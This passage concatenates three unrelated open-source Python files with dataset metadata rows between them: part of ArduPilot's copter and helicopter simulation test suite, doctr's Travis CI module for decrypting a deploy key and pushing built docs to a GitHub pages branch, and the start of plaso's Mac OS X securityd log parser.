self.fly_fence_test), # 20s
("HorizontalAvoidFence",
"Test horizontal Avoidance fence",
self.fly_fence_avoid_test),
("MaxAltFence",
"Test Max Alt Fence",
self.fly_alt_max_fence_test), # 26s
("MinAltFence",
"Test Min Alt Fence",
self.fly_alt_min_fence_test), # 26s
("FenceFloorEnabledLanding",
"Test Landing with Fence floor enabled",
self.fly_fence_floor_enabled_landing),
("AutoTuneSwitch",
"Fly AUTOTUNE on a switch",
self.fly_autotune_switch), # 105s
("GPSGlitchLoiter",
"GPS Glitch Loiter Test",
self.fly_gps_glitch_loiter_test), # 30s
("GPSGlitchAuto",
"GPS Glitch Auto Test",
self.fly_gps_glitch_auto_test),
("ModeAltHold",
"Test AltHold Mode",
self.test_mode_ALT_HOLD),
("ModeLoiter",
"Test Loiter Mode",
self.loiter),
("SimpleMode",
"Fly in SIMPLE mode",
self.fly_simple),
("SuperSimpleCircle",
"Fly a circle in SUPER SIMPLE mode",
self.fly_super_simple), # 38s
("ModeCircle",
"Fly CIRCLE mode",
self.fly_circle), # 27s
("MagFail",
"Test magnetometer failure",
self.test_mag_fail),
("OpticalFlowLimits",
"Fly Optical Flow limits",
self.fly_optical_flow_limits), # 27s
("MotorFail",
"Fly motor failure test",
self.fly_motor_fail),
("Flip",
"Fly Flip Mode",
self.fly_flip),
("CopterMission",
"Fly copter mission",
self.fly_auto_test), # 37s
("SplineLastWaypoint",
"Test Spline as last waypoint",
self.test_spline_last_waypoint),
("Gripper",
"Test gripper",
self.test_gripper), # 28s
("TestGripperMission",
"Test Gripper mission items",
self.test_gripper_mission),
("VisionPosition",
"Fly Vision Position",
self.fly_vision_position), # 24s
("GPSViconSwitching",
"Fly GPS and Vicon Switching",
self.fly_gps_vicon_switching),
])
return ret
def tests1e(self):
'''return list of all tests'''
ret = ([
("BeaconPosition",
"Fly Beacon Position",
self.fly_beacon_position), # 56s
("RTLSpeed",
"Fly RTL Speed",
self.fly_rtl_speed),
("Mount",
"Test Camera/Antenna Mount",
self.test_mount), # 74s
("Button",
"Test Buttons",
self.test_button),
("ShipTakeoff",
"Fly Simulated Ship Takeoff",
self.fly_ship_takeoff),
("RangeFinder",
"Test RangeFinder Basic Functionality",
self.test_rangefinder), # 23s
("SurfaceTracking",
"Test Surface Tracking",
self.test_surface_tracking), # 45s
("Parachute",
"Test Parachute Functionality",
self.test_parachute),
("ParameterChecks",
"Test Arming Parameter Checks",
self.test_parameter_checks),
("ManualThrottleModeChange",
"Check manual throttle mode changes denied on high throttle",
self.fly_manual_throttle_mode_change),
("MANUAL_CONTROL",
"Test mavlink MANUAL_CONTROL",
self.test_manual_control),
("ZigZag",
"Fly ZigZag Mode",
self.fly_zigzag_mode), # 58s
("PosHoldTakeOff",
"Fly POSHOLD takeoff",
self.fly_poshold_takeoff),
("FOLLOW",
"Fly follow mode",
self.fly_follow_mode), # 80s
("RangeFinderDrivers",
"Test rangefinder drivers",
self.fly_rangefinder_drivers), # 62s
("MaxBotixI2CXL",
"Test maxbotix rangefinder drivers",
self.fly_rangefinder_driver_maxbotix), # 62s
("MAVProximity",
"Test MAVLink proximity driver",
self.fly_proximity_mavlink_distance_sensor,
),
("ParameterValidation",
"Test parameters are checked for validity",
self.test_parameter_validation),
("AltTypes",
"Test Different Altitude Types",
self.test_altitude_types),
("RichenPower",
"Test RichenPower generator",
self.test_richenpower),
("IE24",
"Test IntelligentEnergy 2.4kWh generator",
self.test_ie24),
("LogUpload",
"Log upload",
self.log_upload),
])
return ret
# a wrapper around all the 2A,2B,2C..etc tests for travis
def tests2(self):
ret = ([])
ret.extend(self.tests2a())
ret.extend(self.tests2b())
return ret
def tests2a(self):
'''return list of all tests'''
ret = ([
# something about SITLCompassCalibration appears to fail
# this one, so we put it first:
("FixedYawCalibration",
"Test Fixed Yaw Calibration", # about 20 secs
self.test_fixed_yaw_calibration),
# we run this single 8min-and-40s test on its own, apart from
# requiring FixedYawCalibration right before it because without it, it fails to calibrate
("SITLCompassCalibration", # this autotest appears to interfere with FixedYawCalibration, no idea why.
"Test SITL onboard compass calibration",
self.test_mag_calibration),
])
return ret
def tests2b(self): # this block currently around 9.5mins here
'''return list of all tests'''
ret = ([
Test("MotorVibration",
"Fly motor vibration test",
self.fly_motor_vibration),
Test("DynamicNotches",
"Fly Dynamic Notches",
self.fly_dynamic_notches,
attempts=8),
Test("PositionWhenGPSIsZero",
"Ensure position doesn't zero when GPS lost",
self.test_copter_gps_zero),
Test("GyroFFT",
"Fly Gyro FFT",
self.fly_gyro_fft,
attempts=8),
Test("GyroFFTHarmonic",
"Fly Gyro FFT Harmonic Matching",
self.fly_gyro_fft_harmonic,
attempts=8),
Test("CompassReordering",
"Test Compass reordering when priorities are changed",
self.test_mag_reordering), # 40sec?
Test("CRSF",
"Test RC CRSF",
self.test_crsf), # 20secs ish
Test("MotorTest",
"Run Motor Tests",
self.test_motortest), # 20secs ish
Test("AltEstimation",
"Test that Alt Estimation is mandatory for ALT_HOLD",
self.test_alt_estimate_prearm), # 20secs ish
Test("EKFSource",
"Check EKF Source Prearms work",
self.test_ekf_source),
Test("GSF",
"Check GSF",
self.test_gsf),
Test("FlyEachFrame",
"Fly each supported internal frame",
self.fly_each_frame),
Test("GPSBlending",
"Test GPS Blending",
self.test_gps_blending),
Test("DataFlash",
"Test DataFlash Block backend",
self.test_dataflash_sitl),
Test("DataFlashErase",
"Test DataFlash Block backend erase",
self.test_dataflash_erase),
Test("Callisto",
"Test Callisto",
self.test_callisto),
Test("Replay",
"Test Replay",
self.test_replay),
Test("LogUpload",
"Log upload",
self.log_upload),
])
return ret
def testcan(self):
ret = ([
("CANGPSCopterMission",
"Fly copter mission",
self.fly_auto_test_using_can_gps),
])
return ret
def tests(self):
ret = []
ret.extend(self.tests1())
ret.extend(self.tests2())
return ret
def disabled_tests(self):
return {
"Parachute": "See https://github.com/ArduPilot/ardupilot/issues/4702",
"HorizontalAvoidFence": "See https://github.com/ArduPilot/ardupilot/issues/11525",
"AltEstimation": "See https://github.com/ArduPilot/ardupilot/issues/15191",
}
class AutoTestHeli(AutoTestCopter):
def log_name(self):
return "HeliCopter"
def default_frame(self):
return "heli"
def sitl_start_location(self):
return SITL_START_LOCATION_AVC
def default_speedup(self):
'''Heli seems to be race-free'''
return 100
def is_heli(self):
return True
def rc_defaults(self):
ret = super(AutoTestHeli, self).rc_defaults()
ret[8] = 1000
ret[3] = 1000 # collective
return ret
@staticmethod
def get_position_armable_modes_list():
'''filter THROW mode out of armable modes list; Heli is special-cased'''
ret = AutoTestCopter.get_position_armable_modes_list()
ret = filter(lambda x : x != "THROW", ret)
return ret
def loiter_requires_position(self):
self.progress("Skipping loiter-requires-position for heli; rotor runup issues")
def get_collective_out(self):
servo = self.mav.recv_match(type='SERVO_OUTPUT_RAW', blocking=True)
chan_pwm = (servo.servo1_raw + servo.servo2_raw + servo.servo3_raw)/3.0
return chan_pwm
def rotor_runup_complete_checks(self):
# Takeoff and landing in Loiter
TARGET_RUNUP_TIME = 10
self.zero_throttle()
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
servo = self.mav.recv_match(type='SERVO_OUTPUT_RAW', blocking=True)
coll = servo.servo1_raw
coll = coll + 50
self.set_parameter("H_RSC_RUNUP_TIME", TARGET_RUNUP_TIME)
self.progress("Initiate Runup by putting some throttle")
self.set_rc(8, 2000)
self.set_rc(3, 1700)
self.progress("Collective threshold PWM %u" % coll)
tstart = self.get_sim_time()
self.progress("Wait that collective PWM pass threshold value")
servo = self.mav.recv_match(condition='SERVO_OUTPUT_RAW.servo1_raw>%u' % coll, blocking=True)
runup_time = self.get_sim_time() - tstart
self.progress("Collective is now at PWM %u" % servo.servo1_raw)
self.mav.wait_heartbeat()
if runup_time < TARGET_RUNUP_TIME:
self.zero_throttle()
self.set_rc(8, 1000)
self.disarm_vehicle()
self.mav.wait_heartbeat()
raise NotAchievedException("Takeoff initiated before runup time complete %u" % runup_time)
self.progress("Runup time %u" % runup_time)
self.zero_throttle()
self.set_rc(8, 1000)
self.land_and_disarm()
self.mav.wait_heartbeat()
# fly_avc_test - fly AVC mission
def fly_avc_test(self):
# Arm
self.change_mode('STABILIZE')
self.wait_ready_to_arm()
self.arm_vehicle()
self.progress("Raising rotor speed")
self.set_rc(8, 2000)
# upload mission from file
self.progress("# Load copter_AVC2013_mission")
# load the waypoint count
num_wp = self.load_mission("copter_AVC2013_mission.txt", strict=False)
if not num_wp:
raise NotAchievedException("load copter_AVC2013_mission failed")
self.progress("Fly AVC mission from 1 to %u" % num_wp)
self.set_current_waypoint(1)
# wait for motor runup
self.delay_sim_time(20)
# switch into AUTO mode and raise throttle
self.change_mode('AUTO')
self.set_rc(3, 1500)
# fly the mission
self.wait_waypoint(0, num_wp-1, timeout=500)
# set throttle to minimum
self.zero_throttle()
# wait for disarm
self.wait_disarmed()
self.progress("MOTORS DISARMED OK")
self.progress("Lowering rotor speed")
self.set_rc(8, 1000)
self.progress("AVC mission completed: passed!")
def fly_heli_poshold_takeoff(self):
"""ensure vehicle stays put until it is ready to fly"""
self.context_push()
ex = None
try:
self.set_parameter("PILOT_TKOFF_ALT", 700)
self.change_mode('POSHOLD')
self.zero_throttle()
self.set_rc(8, 1000)
self.wait_ready_to_arm()
# Arm
self.arm_vehicle()
self.progress("Raising rotor speed")
self.set_rc(8, 2000)
self.progress("wait for rotor runup to complete")
self.wait_servo_channel_value(8, 1660, timeout=10)
self.delay_sim_time(20)
# check we are still on the ground...
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
max_relalt_mm = 1000
if abs(m.relative_alt) > max_relalt_mm:
raise NotAchievedException("Took off prematurely (abs(%f)>%f)" %
(m.relative_alt, max_relalt_mm))
self.progress("Pushing collective past half-way")
self.set_rc(3, 1600)
self.delay_sim_time(0.5)
self.progress("Bringing back to hover collective")
self.set_rc(3, 1500)
# make sure we haven't already reached alt:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
if abs(m.relative_alt) > 500:
raise NotAchievedException("Took off too fast")
self.progress("Monitoring takeoff-to-alt")
self.wait_altitude(6.9, 8, relative=True)
self.progress("Making sure we stop at our takeoff altitude")
tstart = self.get_sim_time()
while self.get_sim_time() - tstart < 5:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
delta = abs(7000 - m.relative_alt)
self.progress("alt=%f delta=%f" % (m.relative_alt/1000,
delta/1000))
if delta > 1000:
raise NotAchievedException("Failed to maintain takeoff alt")
self.progress("takeoff OK")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.land_and_disarm()
self.set_rc(8, 1000)
self.context_pop()
if ex is not None:
raise ex
def fly_heli_stabilize_takeoff(self):
""""""
self.context_push()
ex = None
try:
self.change_mode('STABILIZE')
self.set_rc(3, 1000)
self.set_rc(8, 1000)
self.wait_ready_to_arm()
self.arm_vehicle()
self.set_rc(8, 2000)
self.progress("wait for rotor runup to complete")
self.wait_servo_channel_value(8, 1660, timeout=10)
self.delay_sim_time(20)
# check we are still on the ground...
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
if abs(m.relative_alt) > 100:
raise NotAchievedException("Took off prematurely")
self.progress("Pushing throttle past half-way")
self.set_rc(3, 1600)
self.progress("Monitoring takeoff")
self.wait_altitude(6.9, 8, relative=True)
self.progress("takeoff OK")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.land_and_disarm()
self.set_rc(8, 1000)
self.context_pop()
if ex is not None:
raise ex
def fly_spline_waypoint(self, timeout=600):
"""ensure basic spline functionality works"""
self.load_mission("copter_spline_mission.txt", strict=False)
self.change_mode("LOITER")
self.wait_ready_to_arm()
self.arm_vehicle()
self.progress("Raising rotor speed")
self.set_rc(8, 2000)
self.delay_sim_time(20)
self.change_mode("AUTO")
self.set_rc(3, 1500)
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > timeout:
raise AutoTestTimeoutException("Vehicle did not disarm after mission")
if not self.armed():
break
self.delay_sim_time(1)
self.progress("Lowering rotor speed")
self.set_rc(8, 1000)
def fly_autorotation(self, timeout=600):
"""ensure basic spline functionality works"""
self.set_parameter("AROT_ENABLE", 1)
start_alt = 100 # metres
self.set_parameter("PILOT_TKOFF_ALT", start_alt * 100)
self.change_mode('POSHOLD')
self.set_rc(3, 1000)
self.set_rc(8, 1000)
self.wait_ready_to_arm()
self.arm_vehicle()
self.set_rc(8, 2000)
self.progress("wait for rotor runup to complete")
self.wait_servo_channel_value(8, 1660, timeout=10)
self.delay_sim_time(20)
self.set_rc(3, 2000)
self.wait_altitude(start_alt - 1,
(start_alt + 5),
relative=True,
timeout=timeout)
self.context_collect('STATUSTEXT')
self.progress("Triggering autorotate by raising interlock")
self.set_rc(8, 1000)
self.wait_statustext("SS Glide Phase", check_context=True)
self.wait_statustext(r"SIM Hit ground at ([0-9.]+) m/s",
check_context=True,
regex=True)
speed = float(self.re_match.group(1))
if speed > 30:
raise NotAchievedException("Hit too hard")
self.wait_disarmed()
def set_rc_default(self):
super(AutoTestHeli, self).set_rc_default()
self.progress("Lowering rotor speed")
self.set_rc(8, 1000)
def tests(self):
'''return list of all tests'''
ret = AutoTest.tests(self)
ret.extend([
("AVCMission", "Fly AVC mission", self.fly_avc_test),
("RotorRunUp",
"Test rotor runup",
self.rotor_runup_complete_checks),
("PosHoldTakeOff",
"Fly POSHOLD takeoff",
self.fly_heli_poshold_takeoff),
("StabilizeTakeOff",
"Fly stabilize takeoff",
self.fly_heli_stabilize_takeoff),
("SplineWaypoint",
"Fly Spline Waypoints",
self.fly_spline_waypoint),
("AutoRotation",
"Fly AutoRotation",
self.fly_autorotation),
("LogUpload",
"Log upload",
self.log_upload),
])
return ret
def disabled_tests(self):
return {
"SplineWaypoint": "See https://github.com/ArduPilot/ardupilot/issues/14593",
}
class AutoTestCopterTests1(AutoTestCopter):
def tests(self):
return self.tests1()
class AutoTestCopterTests1a(AutoTestCopter):
def tests(self):
return self.tests1a()
class AutoTestCopterTests1b(AutoTestCopter):
def tests(self):
return self.tests1b()
class AutoTestCopterTests1c(AutoTestCopter):
def tests(self):
return self.tests1c()
class AutoTestCopterTests1d(AutoTestCopter):
def tests(self):
return self.tests1d()
class AutoTestCopterTests1e(AutoTestCopter):
def tests(self):
return self.tests1e()
class AutoTestCopterTests2(AutoTestCopter):
def tests(self):
return self.tests2()
class AutoTestCopterTests2a(AutoTestCopter):
def tests(self):
return self.tests2a()
class AutoTestCopterTests2b(AutoTestCopter):
def tests(self):
return self.tests2b()
class AutoTestCAN(AutoTestCopter):
def tests(self):
return self.testcan()
| gpl-3.0 | 940,847,501,828,778,200 | 37.953043 | 127 | 0.537486 | false |
gforsyth/doctr_testing | doctr/travis.py | 1 | 12160 | """
The code that should be run on Travis
"""
import os
import shlex
import shutil
import subprocess
import sys
import glob
from cryptography.fernet import Fernet
def decrypt_file(file, key):
"""
Decrypts the file ``file``.
The encrypted file is assumed to end with the ``.enc`` extension. The
decrypted file is saved to the same location without the ``.enc``
extension.
The permissions on the decrypted file are automatically set to 0o600.
See also :func:`doctr.local.encrypt_file`.
"""
if not file.endswith('.enc'):
raise ValueError("%s does not end with .enc" % file)
fer = Fernet(key)
with open(file, 'rb') as f:
decrypted_file = fer.decrypt(f.read())
with open(file[:-4], 'wb') as f:
f.write(decrypted_file)
os.chmod(file[:-4], 0o600)
def setup_deploy_key(keypath='github_deploy_key', key_ext='.enc'):
"""
Decrypts the deploy key and configures it with ssh
The key is assumed to be encrypted as keypath + key_ext, and the
encryption key is assumed to be set in the environment variable
DOCTR_DEPLOY_ENCRYPTION_KEY.
"""
key = os.environ.get("DOCTR_DEPLOY_ENCRYPTION_KEY", None)
if not key:
raise RuntimeError("DOCTR_DEPLOY_ENCRYPTION_KEY environment variable is not set")
key_filename = os.path.basename(keypath)
key = key.encode('utf-8')
decrypt_file(keypath + key_ext, key)
key_path = os.path.expanduser("~/.ssh/" + key_filename)
os.makedirs(os.path.expanduser("~/.ssh"), exist_ok=True)
os.rename(keypath, key_path)
with open(os.path.expanduser("~/.ssh/config"), 'a') as f:
f.write("Host github.com"
' IdentityFile "%s"'
" LogLevel ERROR\n" % key_path)
# start ssh-agent and add key to it
# info from SSH agent has to be put into the environment
agent_info = subprocess.check_output(['ssh-agent', '-s'])
agent_info = agent_info.decode('utf-8')
agent_info = agent_info.split()
AUTH_SOCK = agent_info[0].split('=')[1][:-1]
AGENT_PID = agent_info[3].split('=')[1][:-1]
os.putenv('SSH_AUTH_SOCK', AUTH_SOCK)
os.putenv('SSH_AGENT_PID', AGENT_PID)
run(['ssh-add', os.path.expanduser('~/.ssh/' + key_filename)])
# XXX: Do this in a way that is streaming
def run_command_hiding_token(args, token):
command = ' '.join(map(shlex.quote, args))
command = command.replace(token.decode('utf-8'), '~'*len(token))
print(command)
p = subprocess.run(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.stdout, p.stderr
out = out.replace(token, b"~"*len(token))
err = err.replace(token, b"~"*len(token))
return (out, err, p.returncode)
def get_token():
"""
Get the encrypted GitHub token in Travis.
Make sure the contents this variable do not leak. The ``run()`` function
will remove this from the output, so always use it.
"""
token = os.environ.get("GH_TOKEN", None)
if not token:
raise RuntimeError("GH_TOKEN environment variable not set")
token = token.encode('utf-8')
return token
def run(args):
"""
Run the command ``args``.
Automatically hides the secret GitHub token from the output.
"""
if "DOCTR_DEPLOY_ENCRYPTION_KEY" in os.environ:
token = b''
else:
token = get_token()
out, err, returncode = run_command_hiding_token(args, token)
if out:
print(out.decode('utf-8'))
if err:
print(err.decode('utf-8'), file=sys.stderr)
if returncode != 0:
sys.exit(returncode)
def get_current_repo():
"""
Get the GitHub repo name for the current directory.
Assumes that the repo is in the ``origin`` remote.
"""
remote_url = subprocess.check_output(['git', 'config', '--get',
'remote.origin.url']).decode('utf-8')
# Travis uses the https clone url
_, org, git_repo = remote_url.rsplit('.git', 1)[0].rsplit('/', 2)
return (org + '/' + git_repo)
def setup_GitHub_push(deploy_repo, auth_type='deploy_key', full_key_path='github_deploy_key.enc', require_master=True, deploy_branch='gh-pages'):
"""
Setup the remote to push to GitHub (to be run on Travis).
``auth_type`` should be either ``'deploy_key'`` or ``'token'``.
For ``auth_type='token'``, this sets up the remote with the token and
checks out the gh-pages branch. The token to push to GitHub is assumed to be in the ``GH_TOKEN`` environment
variable.
For ``auth_type='deploy_key'``, this sets up the remote with ssh access.
"""
if auth_type not in ['deploy_key', 'token']:
raise ValueError("auth_type must be 'deploy_key' or 'token'")
TRAVIS_BRANCH = os.environ.get("TRAVIS_BRANCH", "")
TRAVIS_PULL_REQUEST = os.environ.get("TRAVIS_PULL_REQUEST", "")
if TRAVIS_BRANCH != "master" and require_master:
print("The docs are only pushed to {} from master. To allow pushing from "
"a non-master branch, use the --no-require-master flag".format(deploy_branch), file=sys.stderr)
print("This is the {TRAVIS_BRANCH} branch".format(TRAVIS_BRANCH=TRAVIS_BRANCH), file=sys.stderr)
return False
if TRAVIS_PULL_REQUEST != "false":
print("The website and docs are not pushed to {} on pull requests".format(deploy_branch),
file=sys.stderr)
return False
print("Setting git attributes")
# Should we add some user.email?
run(['git', 'config', '--global', 'user.name', "Doctr (Travis CI)"])
remotes = subprocess.check_output(['git', 'remote']).decode('utf-8').split('\n')
if 'doctr_remote' in remotes:
print("doctr_remote already exists, removing")
run(['git', 'remote', 'remove', 'doctr_remote'])
print("Adding doctr remote")
if auth_type == 'token':
token = get_token()
run(['git', 'remote', 'add', 'doctr_remote',
'https://{token}@github.com/{deploy_repo}.git'.format(token=token.decode('utf-8'),
deploy_repo=deploy_repo)])
else:
keypath, key_ext = full_key_path.rsplit('.', 1)
key_ext = '.' + key_ext
setup_deploy_key(keypath=keypath, key_ext=key_ext)
run(['git', 'remote', 'add', 'doctr_remote',
'[email protected]:{deploy_repo}.git'.format(deploy_repo=deploy_repo)])
print("Fetching doctr remote")
run(['git', 'fetch', 'doctr_remote'])
#create empty branch with .nojekyll if it doesn't already exist
new_deploy_branch = create_deploy_branch(deploy_branch)
print("Checking out {}".format(deploy_branch))
local_deploy_branch_exists = deploy_branch in subprocess.check_output(['git', 'branch']).decode('utf-8').split()
if new_deploy_branch or local_deploy_branch_exists:
run(['git', 'checkout', deploy_branch])
run(['git', 'pull', 'doctr_remote', deploy_branch])
else:
run(['git', 'checkout', '-b', deploy_branch, '--track',
'doctr_remote/{}'.format(deploy_branch)])
print("Done")
return True
def deploy_branch_exists(deploy_branch='gh-pages'):
"""Check if the remote deploy branch exists
This isn't completely robust. If there are multiple remotes and the branch
is created on the non-default remote, this won't see it.
"""
remote_name = 'doctr_remote'
branch_names = subprocess.check_output(['git', 'branch', '-r']).decode('utf-8').split()
return '{remote}/{branch}'.format(remote=remote_name,
branch=deploy_branch) in branch_names
def create_deploy_branch(deploy_branch):
"""
If there is no remote deploy branch, create one.
Return True if branch was created, False if not.
Default value for deploy_branch is ``gh-pages``
"""
if not deploy_branch_exists(deploy_branch):
print("Creating {} branch".format(deploy_branch))
run(['git', 'checkout', '--orphan', deploy_branch])
# delete everything in the new ref. this is non-destructive to existing
# refs/branches, etc...
run(['git', 'rm', '-rf', '.'])
print("Adding .nojekyll file to {}".format(deploy_branch))
run(['touch', '.nojekyll'])
run(['git', 'add', '.nojekyll'])
run(['git', 'commit', '-m', 'Create new branch {} with .nojekyll'.format(deploy_branch)])
print("Pushing branch {} to remote".format(deploy_branch))
run(['git', 'push', '-u', 'doctr_remote', deploy_branch])
# return to master branch
run(['git', 'checkout', '-'])
return True
return False
def find_sphinx_build_dir():
"""
Find build subfolder within sphinx docs directory.
This is called by :func:`commit_docs` if keyword arg ``built_docs`` is not
specified on the command line.
"""
build = glob.glob('**/*build/html', recursive=True)
if not build:
raise RuntimeError("Could not find Sphinx build directory automatically")
build_folder = build[0]
return build_folder
# Here is the logic to get the Travis job number, to only run commit_docs in
# the right build.
#
# TRAVIS_JOB_NUMBER = os.environ.get("TRAVIS_JOB_NUMBER", '')
# ACTUAL_TRAVIS_JOB_NUMBER = TRAVIS_JOB_NUMBER.split('.')[1]
def sync_from_log(src, dst, log_file):
"""
Sync the files in ``src`` to ``dst``.
The files that are synced are logged to ``log_file``. If ``log_file``
exists, the files in ``log_file`` are removed first.
Returns ``(added, removed)``, where added is a list of all files synced from
``src`` (even if it already existed in ``dst``), and ``removed`` is every
file from ``log_file`` that was removed from ``dst`` because it wasn't in
``src``. ``added`` also includes the log file.
"""
from os.path import join, exists, isdir
if not src.endswith(os.sep):
src += os.sep
added, removed = [], []
if not exists(log_file):
# Assume this is the first run
print("%s doesn't exist. Not removing any files." % log_file)
else:
with open(log_file) as f:
files = f.read().strip().split('\n')
for new_f in files:
new_f = new_f.strip()
if exists(new_f):
os.remove(new_f)
removed.append(new_f)
else:
print("Warning: File %s doesn't exist." % new_f, file=sys.stderr)
files = glob.iglob(join(src, '**'), recursive=True)
# sorted makes this easier to test
for f in sorted(files):
new_f = join(dst, f[len(src):])
if isdir(f):
os.makedirs(new_f, exist_ok=True)
else:
shutil.copy2(f, new_f)
added.append(new_f)
if new_f in removed:
removed.remove(new_f)
with open(log_file, 'w') as f:
f.write('\n'.join(added))
added.append(log_file)
return added, removed
def commit_docs(*, added, removed):
"""
Commit the docs to ``gh-pages`` or a specified deploy branch.
Assumes that :func:`setup_GitHub_push`, which sets up the ``doctr_remote``
remote, has been run and returned True.
Returns True if changes were committed and False if no changes were
committed.
"""
TRAVIS_BUILD_NUMBER = os.environ.get("TRAVIS_BUILD_NUMBER", "<unknown>")
for f in added:
run(['git', 'add', f])
for f in removed:
run(['git', 'rm', f])
# Only commit if there were changes
if subprocess.run(['git', 'diff-index', '--quiet', 'HEAD', '--'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE).returncode != 0:
print("Committing")
run(['git', 'commit', '-am', "Update docs after building Travis build " + TRAVIS_BUILD_NUMBER])
return True
return False
def push_docs(deploy_branch='gh-pages'):
"""
Push the changes to the ``gh-pages`` branch or specified deploy branch.
Assumes that :func:`setup_GitHub_push` has been run and returned True, and
that :func:`commit_docs` has been run. Does not push anything if no changes
were made.
"""
print("Pulling")
run(['git', 'pull'])
print("Pushing commit")
run(['git', 'push', '-q', 'doctr_remote', deploy_branch])
| mit | -1,302,443,846,925,126,700 | 33.842407 | 145 | 0.616283 | false |
cvandeplas/plaso | plaso/parsers/mac_securityd.py | 1 | 9467 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2014 The Plaso Project Authors.
# Please see the AUTHORS file for details on individual authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This file contains the ASL securityd log plaintext parser."""
import datetime
import logging
import pyparsing
from plaso.events import time_events
from plaso.lib import eventdata
from plaso.lib import timelib
from plaso.parsers import manager
from plaso.parsers import text_parser
__author__ = 'Joaquin Moreno Garijo ([email protected])'
# INFO:
# http://opensource.apple.com/source/Security/Security-55471/sec/securityd/
class MacSecuritydLogEvent(time_events.TimestampEvent):
"""Convenience class for a ASL securityd line event."""
DATA_TYPE = 'mac:asl:securityd:line'
def __init__(
self, timestamp, structure, sender, sender_pid,
security_api, caller, message):
"""Initializes the event object.
Args:
timestamp: The timestamp time value, epoch.
structure: Structure with the parse fields.
level: String with the text representation of the priority level.
facility: String with the ASL facility.
sender: String with the name of the sender.
sender_pid: Process id of the sender.
security_api: Securityd function name.
caller: The caller field, a string containing two hex numbers.
message: String with the ASL message.
"""
super(MacSecuritydLogEvent, self).__init__(
timestamp,
eventdata.EventTimestamp.ADDED_TIME)
self.timestamp = timestamp
self.level = structure.level
self.sender_pid = sender_pid
self.facility = structure.facility
self.sender = sender
self.security_api = security_api
self.caller = caller
self.message = message
class MacSecuritydLogParser(text_parser.PyparsingSingleLineTextParser):
"""Parses the securityd file that contains logs from the security daemon."""
NAME = 'mac_securityd'
DESCRIPTION = u'Parser for Mac OS X securityd log files.'
ENCODING = u'utf-8'
# Default ASL Securityd log.
SECURITYD_LINE = (
text_parser.PyparsingConstants.MONTH.setResultsName('month') +
text_parser.PyparsingConstants.ONE_OR_TWO_DIGITS.setResultsName('day') +
text_parser.PyparsingConstants.TIME.setResultsName('time') +
pyparsing.CharsNotIn(u'[').setResultsName('sender') +
pyparsing.Literal(u'[').suppress() +
text_parser.PyparsingConstants.PID.setResultsName('sender_pid') +
pyparsing.Literal(u']').suppress() +
pyparsing.Literal(u'<').suppress() +
pyparsing.CharsNotIn(u'>').setResultsName('level') +
pyparsing.Literal(u'>').suppress() +
pyparsing.Literal(u'[').suppress() +
pyparsing.CharsNotIn(u'{').setResultsName('facility') +
pyparsing.Literal(u'{').suppress() +
pyparsing.Optional(pyparsing.CharsNotIn(
u'}').setResultsName('security_api')) +
pyparsing.Literal(u'}').suppress() +
pyparsing.Optional(pyparsing.CharsNotIn(u']:').setResultsName('caller')) +
pyparsing.Literal(u']:').suppress() +
pyparsing.SkipTo(pyparsing.lineEnd).setResultsName('message'))
# Repeated line.
REPEATED_LINE = (
text_parser.PyparsingConstants.MONTH.setResultsName('month') +
text_parser.PyparsingConstants.ONE_OR_TWO_DIGITS.setResultsName('day') +
text_parser.PyparsingConstants.TIME.setResultsName('time') +
pyparsing.Literal(u'--- last message repeated').suppress() +
text_parser.PyparsingConstants.INTEGER.setResultsName('times') +
pyparsing.Literal(u'time ---').suppress())
# Define the available log line structures.
LINE_STRUCTURES = [
('logline', SECURITYD_LINE),
('repeated', REPEATED_LINE)]
def __init__(self):
"""Initializes a parser object."""
super(MacSecuritydLogParser, self).__init__()
self._year_use = 0
self._last_month = None
self.previous_structure = None
def VerifyStructure(self, parser_context, line):
"""Verify that this file is a ASL securityd log file.
Args:
parser_context: A parser context object (instance of ParserContext).
line: A single line from the text file.
Returns:
True if this is the correct parser, False otherwise.
"""
try:
line = self.SECURITYD_LINE.parseString(line)
except pyparsing.ParseException:
logging.debug(u'Not a ASL securityd log file')
return False
# Check if the day, month and time is valid taking a random year.
month = timelib.MONTH_DICT.get(line.month.lower())
if not month:
return False
if self._GetTimestamp(line.day, month, 2012, line.time) == 0:
return False
return True
def ParseRecord(self, parser_context, key, structure):
"""Parse each record structure and return an EventObject if applicable.
Args:
parser_context: A parser context object (instance of ParserContext).
key: An identification string indicating the name of the parsed
structure.
structure: A pyparsing.ParseResults object from a line in the
log file.
Returns:
An event object (instance of EventObject) or None.
"""
if key == 'repeated' or key == 'logline':
return self._ParseLogLine(parser_context, structure, key)
else:
logging.warning(
u'Unable to parse record, unknown structure: {0:s}'.format(key))
def _ParseLogLine(self, parser_context, structure, key):
"""Parse a logline and store appropriate attributes.
Args:
parser_context: A parser context object (instance of ParserContext).
key: An identification string indicating the name of the parsed
structure.
structure: A pyparsing.ParseResults object from a line in the
log file.
Returns:
An event object (instance of EventObject) or None.
"""
# TODO: improving this to get a valid year.
if not self._year_use:
self._year_use = parser_context.year
if not self._year_use:
# Get from the creation time of the file.
self._year_use = self._GetYear(
self.file_entry.GetStat(), parser_context.timezone)
# If fail, get from the current time.
if not self._year_use:
self._year_use = timelib.GetCurrentYear()
# Gap detected between years.
month = timelib.MONTH_DICT.get(structure.month.lower())
if not self._last_month:
self._last_month = month
if month < self._last_month:
self._year_use += 1
timestamp = self._GetTimestamp(
structure.day,
month,
self._year_use,
structure.time)
if not timestamp:
logging.debug(u'Invalid timestamp {0:s}'.format(structure.timestamp))
return
self._last_month = month
if key == 'logline':
